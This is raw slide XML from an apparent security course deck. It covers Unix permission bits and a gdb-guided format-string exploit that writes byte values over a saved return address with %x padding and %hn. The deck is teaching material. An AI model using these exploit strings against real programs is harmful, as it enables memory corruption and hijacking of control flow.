              <a:t>/1x $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> + 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>0xffffcebc:	0x080485bb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/4b $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> + 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>0xffffcebc:	0xbb	0x85	0x04	0x08	</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917987" y="2142500"/>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Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2332690" y="2289365"/>
            <a:ext cx="0" cy="1961074"/>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2377090" y="2334994"/>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2791793" y="2481859"/>
            <a:ext cx="0" cy="1543964"/>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Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2856593" y="2547868"/>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3279936" y="2694733"/>
            <a:ext cx="0" cy="1089195"/>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3337298" y="2747783"/>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Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3760641" y="2894648"/>
            <a:ext cx="0" cy="673303"/>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185437" y="4224522"/>
            <a:ext cx="2379077" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Short integer ending in 0x78</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648477" y="3989138"/>
            <a:ext cx="2379340" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Short integer ending in 0xd3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3145260" y="3771033"/>
            <a:ext cx="2300630" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Short integer ending in 0xff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3626654" y="3552928"/>
            <a:ext cx="2300630" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Short integer ending in 0xff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99751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D263B5C0-0F4F-D974-5DFC-95A197A51E7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="69056" tIns="34529" rIns="69056" bIns="34529" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Permission Bits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413699" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61F8E841-173F-21E6-BD91-19CF3D5EC755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="69056" tIns="34529" rIns="69056" bIns="34529" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Used to implement a simple Discretionary Access Control mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413700" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28AA4E3-6EA0-BE17-EEFF-A9C7A4C5DBF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3205163" y="2240756"/>
            <a:ext cx="2447785" cy="53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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="3000" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-rwxrwxrwx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413701" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3DF7EE-7207-0CAF-4465-663741A29BE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1512094" y="2731294"/>
            <a:ext cx="1703992" cy="1916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500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>plain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>d directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>symbolic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>socket</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> FIFO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413702" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{329B5EED-1C40-651C-9DF7-DE889DFE084B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3468291" y="3852863"/>
            <a:ext cx="1998944"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file’s owner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413703" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74AFA562-A567-2EA5-7A13-E832E03EBDFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4273154" y="3498057"/>
            <a:ext cx="2269852"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group members</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413704" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0601291C-A33C-3399-0EBD-95385859E702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="3165873"/>
            <a:ext cx="2681888"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non-owner, non-group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413705" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B8F96B-9779-C134-E1AD-D9306CB465F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="3600450" y="2743201"/>
            <a:ext cx="571500" cy="1041797"/>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6" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60AE0C87-9BB6-4E0B-3803-115DA9CCB9E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4286250" y="2743200"/>
            <a:ext cx="571500" cy="652463"/>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7" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30962BD9-D4CB-D3B2-58E4-729C33D43482}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4914900" y="2743200"/>
            <a:ext cx="571500" cy="378619"/>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8" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE50993-487F-BE4A-DACF-9B2F68E126A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2436019" y="2571750"/>
            <a:ext cx="728663" cy="21669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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitation string starts with the four addresses separated by  characters (24 characters in total):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xbc</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xffAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xbd</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xffBBBB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xbe</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xbf</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br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need to pop up four parameters to reach the addresses and get the counter to 0x78 (120):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%20x%20x%28x%28x</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At this point we have printed 24 + 96 characters and we can use the %n format to write 120 at 0xffffce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>bc:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>hn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185580928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fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To write a value that ends in  0xd3 (211) we need to produce 211 - 120 = 91 characters:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%91x%hn</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
